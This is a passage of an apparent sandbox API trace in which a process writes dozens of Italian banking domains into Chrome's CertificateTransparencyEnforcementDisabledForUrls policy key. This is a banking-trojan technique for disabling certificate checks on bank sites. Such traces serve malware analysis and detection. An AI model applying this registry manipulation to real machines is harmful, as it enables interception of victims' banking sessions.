	[0192.852] RegSetValueExA (in: hKey=0x4fc, lpValueName="163", Reserved=0x0, dwType=0x1, lpData="webteso.ubibanca.it", cbData=0x13 | out: lpData="webteso.ubibanca.it") returned 0x0
	[0192.853] RegCloseKey (hKey=0x4fc) returned 0x0
	[0192.853] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4f8) returned 0x0
	[0192.853] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x500, lpdwDisposition=0x0) returned 0x0
	[0192.854] RegSetValueExA (in: hKey=0x500, lpValueName="164", Reserved=0x0, dwType=0x1, lpData="areariservata.bancamarche.it", cbData=0x1c | out: lpData="areariservata.bancamarche.it") returned 0x0
	[0192.855] RegCloseKey (hKey=0x500) returned 0x0
	[0192.855] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x4fc) returned 0x0
	[0192.855] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x504, lpdwDisposition=0x0) returned 0x0
	[0192.855] RegSetValueExA (in: hKey=0x504, lpValueName="165", Reserved=0x0, dwType=0x1, lpData="compasspay.compass.it", cbData=0x15 | out: lpData="compasspay.compass.it") returned 0x0
	[0192.857] RegCloseKey (hKey=0x504) returned 0x0
	[0192.857] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x500) returned 0x0
	[0192.857] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x508, lpdwDisposition=0x0) returned 0x0
	[0192.857] RegSetValueExA (in: hKey=0x508, lpValueName="166", Reserved=0x0, dwType=0x1, lpData="secure.bancaifis.it", cbData=0x13 | out: lpData="secure.bancaifis.it") returned 0x0
	[0192.859] RegCloseKey (hKey=0x508) returned 0x0
	[0192.859] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x504) returned 0x0
	[0192.859] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x50c, lpdwDisposition=0x0) returned 0x0
	[0192.859] RegSetValueExA (in: hKey=0x50c, lpValueName="167", Reserved=0x0, dwType=0x1, lpData="www.suedtirolbank.eu", cbData=0x14 | out: lpData="www.suedtirolbank.eu") returned 0x0
	[0192.860] RegCloseKey (hKey=0x50c) returned 0x0
	[0192.860] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x508) returned 0x0
	[0192.861] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x510, lpdwDisposition=0x0) returned 0x0
	[0192.861] RegSetValueExA (in: hKey=0x510, lpValueName="168", Reserved=0x0, dwType=0x1, lpData="suedtirolbank.eu", cbData=0x10 | out: lpData="suedtirolbank.eu") returned 0x0
	[0192.862] RegCloseKey (hKey=0x510) returned 0x0
	[0192.862] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x50c) returned 0x0
	[0192.862] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x514, lpdwDisposition=0x0) returned 0x0
	[0192.862] RegSetValueExA (in: hKey=0x514, lpValueName="169", Reserved=0x0, dwType=0x1, lpData="www.albertinisyzbank.it", cbData=0x17 | out: lpData="www.albertinisyzbank.it") returned 0x0
	[0192.864] RegCloseKey (hKey=0x514) returned 0x0
	[0192.864] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x510) returned 0x0
	[0192.864] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x518, lpdwDisposition=0x0) returned 0x0
	[0192.864] RegSetValueExA (in: hKey=0x518, lpValueName="170", Reserved=0x0, dwType=0x1, lpData="albertinisyzbank.it", cbData=0x13 | out: lpData="albertinisyzbank.it") returned 0x0
	[0192.866] RegCloseKey (hKey=0x518) returned 0x0
	[0192.866] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x514) returned 0x0
	[0192.866] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x51c, lpdwDisposition=0x0) returned 0x0
	[0192.866] RegSetValueExA (in: hKey=0x51c, lpValueName="171", Reserved=0x0, dwType=0x1, lpData="www.collegiosindacale.bcc.it", cbData=0x1c | out: lpData="www.collegiosindacale.bcc.it") returned 0x0
	[0192.868] RegCloseKey (hKey=0x51c) returned 0x0
	[0192.868] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x518) returned 0x0
	[0192.868] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x520, lpdwDisposition=0x0) returned 0x0
	[0192.868] RegSetValueExA (in: hKey=0x520, lpValueName="172", Reserved=0x0, dwType=0x1, lpData="collegiosindacale.bcc.it", cbData=0x18 | out: lpData="collegiosindacale.bcc.it") returned 0x0
	[0192.869] RegCloseKey (hKey=0x520) returned 0x0
	[0192.869] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x51c) returned 0x0
	[0192.870] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x524, lpdwDisposition=0x0) returned 0x0
	[0192.870] RegSetValueExA (in: hKey=0x524, lpValueName="173", Reserved=0x0, dwType=0x1, lpData="rob.raiffeisen.it", cbData=0x11 | out: lpData="rob.raiffeisen.it") returned 0x0
	[0192.871] RegCloseKey (hKey=0x524) returned 0x0
	[0192.871] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x520) returned 0x0
	[0192.871] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x528, lpdwDisposition=0x0) returned 0x0
	[0192.872] RegSetValueExA (in: hKey=0x528, lpValueName="174", Reserved=0x0, dwType=0x1, lpData="onlinebanking.carrefourbanca.it", cbData=0x1f | out: lpData="onlinebanking.carrefourbanca.it") returned 0x0
	[0192.873] RegCloseKey (hKey=0x528) returned 0x0
	[0192.873] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x524) returned 0x0
	[0192.873] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x52c, lpdwDisposition=0x0) returned 0x0
	[0192.873] RegSetValueExA (in: hKey=0x52c, lpValueName="175", Reserved=0x0, dwType=0x1, lpData="portale.tercas.it", cbData=0x11 | out: lpData="portale.tercas.it") returned 0x0
	[0192.875] RegCloseKey (hKey=0x52c) returned 0x0
	[0192.875] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x528) returned 0x0
	[0192.875] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x530, lpdwDisposition=0x0) returned 0x0
	[0192.875] RegSetValueExA (in: hKey=0x530, lpValueName="176", Reserved=0x0, dwType=0x1, lpData="www.fondazionecarispezia.it", cbData=0x1b | out: lpData="www.fondazionecarispezia.it") returned 0x0
	[0192.876] RegCloseKey (hKey=0x530) returned 0x0
	[0192.876] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x52c) returned 0x0
	[0192.877] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x534, lpdwDisposition=0x0) returned 0x0
	[0192.877] RegSetValueExA (in: hKey=0x534, lpValueName="177", Reserved=0x0, dwType=0x1, lpData="fondazionecarispezia.it", cbData=0x17 | out: lpData="fondazionecarispezia.it") returned 0x0
	[0192.878] RegCloseKey (hKey=0x534) returned 0x0
	[0192.878] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x530) returned 0x0
	[0192.878] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x538, lpdwDisposition=0x0) returned 0x0
	[0192.879] RegSetValueExA (in: hKey=0x538, lpValueName="178", Reserved=0x0, dwType=0x1, lpData="statements.eabplc.com", cbData=0x15 | out: lpData="statements.eabplc.com") returned 0x0
	[0192.880] RegCloseKey (hKey=0x538) returned 0x0
	[0192.880] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x534) returned 0x0
	[0192.880] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x53c, lpdwDisposition=0x0) returned 0x0
	[0192.881] RegSetValueExA (in: hKey=0x53c, lpValueName="179", Reserved=0x0, dwType=0x1, lpData="edrsgrspa.edmond-de-rothschild.it", cbData=0x21 | out: lpData="edrsgrspa.edmond-de-rothschild.it") returned 0x0
	[0192.882] RegCloseKey (hKey=0x53c) returned 0x0
	[0192.882] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x538) returned 0x0
	[0192.882] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x540, lpdwDisposition=0x0) returned 0x0
	[0192.882] RegSetValueExA (in: hKey=0x540, lpValueName="180", Reserved=0x0, dwType=0x1, lpData="dbonline.deutsche-bank.it", cbData=0x19 | out: lpData="dbonline.deutsche-bank.it") returned 0x0
	[0192.884] RegCloseKey (hKey=0x540) returned 0x0
	[0192.884] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x53c) returned 0x0
	[0192.884] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x544, lpdwDisposition=0x0) returned 0x0
	[0192.884] RegSetValueExA (in: hKey=0x544, lpValueName="181", Reserved=0x0, dwType=0x1, lpData="ib.raikaritten.it", cbData=0x11 | out: lpData="ib.raikaritten.it") returned 0x0
	[0192.885] RegCloseKey (hKey=0x544) returned 0x0
	[0192.886] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x540) returned 0x0
	[0192.886] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x548, lpdwDisposition=0x0) returned 0x0
	[0192.886] RegSetValueExA (in: hKey=0x548, lpValueName="182", Reserved=0x0, dwType=0x1, lpData="investors.fonspa.it", cbData=0x13 | out: lpData="investors.fonspa.it") returned 0x0
	[0192.887] RegCloseKey (hKey=0x548) returned 0x0
	[0192.887] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x544) returned 0x0
	[0192.887] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x54c, lpdwDisposition=0x0) returned 0x0
	[0192.888] RegSetValueExA (in: hKey=0x54c, lpValueName="183", Reserved=0x0, dwType=0x1, lpData="www.fcabank.it", cbData=0xe | out: lpData="www.fcabank.it") returned 0x0
	[0192.889] RegCloseKey (hKey=0x54c) returned 0x0
	[0192.889] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x548) returned 0x0
	[0192.889] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x550, lpdwDisposition=0x0) returned 0x0
	[0192.889] RegSetValueExA (in: hKey=0x550, lpValueName="184", Reserved=0x0, dwType=0x1, lpData="fcabank.it", cbData=0xa | out: lpData="fcabank.it") returned 0x0
	[0192.891] RegCloseKey (hKey=0x550) returned 0x0
	[0192.891] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x54c) returned 0x0
	[0192.891] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x554, lpdwDisposition=0x0) returned 0x0
	[0192.891] RegSetValueExA (in: hKey=0x554, lpValueName="185", Reserved=0x0, dwType=0x1, lpData="internetbanking.venetobanca.it", cbData=0x1e | out: lpData="internetbanking.venetobanca.it") returned 0x0
	[0192.893] RegCloseKey (hKey=0x554) returned 0x0
	[0192.893] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x550) returned 0x0
	[0192.893] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x558, lpdwDisposition=0x0) returned 0x0
	[0192.893] RegSetValueExA (in: hKey=0x558, lpValueName="186", Reserved=0x0, dwType=0x1, lpData="www.agenziabpb.it", cbData=0x11 | out: lpData="www.agenziabpb.it") returned 0x0
	[0192.895] RegCloseKey (hKey=0x558) returned 0x0
	[0192.895] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x554) returned 0x0
	[0192.895] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x55c, lpdwDisposition=0x0) returned 0x0
	[0192.895] RegSetValueExA (in: hKey=0x55c, lpValueName="187", Reserved=0x0, dwType=0x1, lpData="agenziabpb.it", cbData=0xd | out: lpData="agenziabpb.it") returned 0x0
	[0192.896] RegCloseKey (hKey=0x55c) returned 0x0
	[0192.897] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x558) returned 0x0
	[0192.897] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x560, lpdwDisposition=0x0) returned 0x0
	[0192.897] RegSetValueExA (in: hKey=0x560, lpValueName="188", Reserved=0x0, dwType=0x1, lpData="servizionline.bcp.it", cbData=0x14 | out: lpData="servizionline.bcp.it") returned 0x0
	[0192.898] RegCloseKey (hKey=0x560) returned 0x0
	[0192.898] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x55c) returned 0x0
	[0192.898] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x564, lpdwDisposition=0x0) returned 0x0
	[0192.899] RegSetValueExA (in: hKey=0x564, lpValueName="189", Reserved=0x0, dwType=0x1, lpData="valido.bancaeuro.it", cbData=0x13 | out: lpData="valido.bancaeuro.it") returned 0x0
	[0192.900] RegCloseKey (hKey=0x564) returned 0x0
	[0192.900] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x560) returned 0x0
	[0192.900] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x568, lpdwDisposition=0x0) returned 0x0
	[0192.900] RegSetValueExA (in: hKey=0x568, lpValueName="190", Reserved=0x0, dwType=0x1, lpData="saas.racomputer.it", cbData=0x12 | out: lpData="saas.racomputer.it") returned 0x0
	[0192.902] RegCloseKey (hKey=0x568) returned 0x0
	[0192.902] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x564) returned 0x0
	[0192.902] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x56c, lpdwDisposition=0x0) returned 0x0
	[0192.902] RegSetValueExA (in: hKey=0x56c, lpValueName="191", Reserved=0x0, dwType=0x1, lpData="login.binck.it", cbData=0xe | out: lpData="login.binck.it") returned 0x0
	[0192.903] RegCloseKey (hKey=0x56c) returned 0x0
	[0192.903] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x568) returned 0x0
	[0192.904] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x570, lpdwDisposition=0x0) returned 0x0
	[0192.904] RegSetValueExA (in: hKey=0x570, lpValueName="192", Reserved=0x0, dwType=0x1, lpData="www.bmedonline.it", cbData=0x11 | out: lpData="www.bmedonline.it") returned 0x0
	[0192.905] RegCloseKey (hKey=0x570) returned 0x0
	[0192.905] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x56c) returned 0x0
	[0192.905] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x574, lpdwDisposition=0x0) returned 0x0
	[0192.905] RegSetValueExA (in: hKey=0x574, lpValueName="193", Reserved=0x0, dwType=0x1, lpData="bmedonline.it", cbData=0xd | out: lpData="bmedonline.it") returned 0x0
	[0192.907] RegCloseKey (hKey=0x574) returned 0x0
	[0192.907] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x570) returned 0x0
	[0192.907] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x578, lpdwDisposition=0x0) returned 0x0
	[0192.907] RegSetValueExA (in: hKey=0x578, lpValueName="194", Reserved=0x0, dwType=0x1, lpData="ib.bancapassadore.it", cbData=0x14 | out: lpData="ib.bancapassadore.it") returned 0x0
	[0192.908] RegCloseKey (hKey=0x578) returned 0x0
	[0192.909] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x574) returned 0x0
	[0192.909] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x57c, lpdwDisposition=0x0) returned 0x0
	[0192.909] RegSetValueExA (in: hKey=0x57c, lpValueName="195", Reserved=0x0, dwType=0x1, lpData="www2.civibank.com", cbData=0x11 | out: lpData="www2.civibank.com") returned 0x0
	[0192.910] RegCloseKey (hKey=0x57c) returned 0x0
